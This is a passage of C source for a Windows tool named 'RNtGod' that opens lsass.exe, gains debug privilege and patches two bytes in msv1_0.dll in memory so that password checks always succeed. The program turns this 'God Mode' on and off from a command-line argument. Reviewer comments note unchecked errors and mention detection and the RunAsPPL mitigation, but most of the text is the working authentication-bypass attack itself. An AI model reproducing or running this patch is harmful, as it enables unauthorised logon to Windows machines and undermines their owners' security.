    hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwTargetPid); // not checked for INVALID_HANDLE_VALUE
    bModule = Module32First(hModuleSnap, &lpModInfo);
    while ( bModule )
    {
        if (lstrcmpi(dn, lpModInfo.szModule) == 0) // case-insensitive name match
        {
            dwModBase = (DWORD)lpModInfo.modBaseAddr;
            //printf("%x\n", dwModBase);
            break;
        }
        Module32Next(hModuleSnap, &lpModInfo); // result ignored: see note above
    }
    CloseHandle(hModuleSnap);
    return dwModBase;
}
// 虚拟地址转换
// Converts a module-relative pattern offset into a virtual address inside
// the target process: module base plus offset, with no range checking.
DWORD GetSinatureViraddr(DWORD dwSinatureAddr, DWORD dwModBase)
{
    DWORD dwVirAddr = dwModBase;
    dwVirAddr += dwSinatureAddr;
    return dwVirAddr;
}
// 去密码函数
void FuckPassword (char *checkbuff, DWORD dwTargetPid, DWORD dwSinatureVirAddr)
{
    // Opens the target process and overwrites two bytes at
    // dwSinatureVirAddr: buff1 when checkbuff matches "on"
    // (case-insensitively), otherwise buff2, which is the 32 C0 pattern the
    // scanner originally matched, i.e. the restore path.
    // NOTE(review): the OpenProcess, VirtualProtectEx and WriteProcessMemory
    // results are all unchecked, hProcess is never closed, and the pid
    // parameter is reused as the old-protection output slot (see below).
    // From a defender's view, the cross-process VirtualProtectEx +
    // WriteProcessMemory into lsass.exe is the observable action; with LSA
    // protection (RunAsPPL) enabled the OpenProcess with PROCESS_ALL_ACCESS
    // is expected to be denied for a non-protected caller.
    HANDLE hProcess = NULL;
    char buff1[] = "\xB0\x10";
    char buff2[] = "\x32\xC0";
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwTargetPid);
    // &dwTargetPid receives the previous protection, clobbering the pid.
    VirtualProtectEx(hProcess, (void *)dwSinatureVirAddr, 2, PAGE_READWRITE, &dwTargetPid);
    if ( lstrcmpi("on", checkbuff) == 0 )
    {
        WriteProcessMemory(hProcess, (void *)dwSinatureVirAddr, buff1, 2, 0);
        printf("Open God Mode");
    }
    else
    {
        WriteProcessMemory(hProcess, (void *)dwSinatureVirAddr, buff2, 2, 0);
        printf("Close God Mode");
    }
    // dwTargetPid now holds the old protection, so this restores it.
    VirtualProtectEx(hProcess, (void *)dwSinatureVirAddr, 2, dwTargetPid, &dwTargetPid);
}
// 版权函数
// Prints the startup banner, one line per entry of the table below.
void CopyRightInfo()
{
    static const char *const banner[] = {
        "------------------------------------------\n",
        "RNtGod\n",
        "Author: Cyg07\n",
        "Reverse from golds7n[LAG]'s NtGod\n",
        "------------------------------------------\n",
    };
    size_t i;
    for (i = 0; i < sizeof(banner) / sizeof(banner[0]); ++i)
        printf("%s", banner[i]);
}
int main(int argc, char* argv[])
{
    // Entry point. Runs the steps from the write-up in order: banner,
    // argument check, pattern offset in msv1_0.dll, debug privilege,
    // lsass.exe pid, module base, base + offset, then the patch.
    CopyRightInfo();
    if (argc < 2)
    {
        printf("Usage: %s On|OFF\n\n", argv[0]);
        return 0;
    }
    char *DllName = "msv1_0.dll";    // target DLL
    char *ProcessName = "lsass.exe"; // target process
    DWORD dwModBase = NULL;          // DLL base address in the target process
    DWORD dwSinatureAddr = NULL;     // pattern offset within the DLL
    DWORD dwSinatureVirAddr = NULL;  // virtual address of the pattern
    // NOTE(review): none of the results below is validated. GetSinatureAddr
    // returns -1 when the DLL fails to load, GetTargetPid returns 0 when the
    // process is absent and GetModBase may return 0; all of them still fall
    // through to FuckPassword.
    dwSinatureAddr = GetSinatureAddr(DllName); // pattern offset
    if ( EnableDebugPriv() == NULL ) // privilege step; failure is only logged
    {
        printf("Failt to enable debug priv.\n");
    }
    DWORD dwTargetPid = GetTargetPid(ProcessName); // lsass.exe pid
    // printf("%d\n", dwTargetPid);
    dwModBase = GetModBase(dwTargetPid, DllName); // module base
    dwSinatureVirAddr = GetSinatureViraddr(dwSinatureAddr, dwModBase); // base + offset
    // argv[1] is compared case-insensitively with "on" inside FuckPassword;
    // any other value takes the restore path.
    FuckPassword(argv[1], dwTargetPid, dwSinatureVirAddr);
    return 0;
}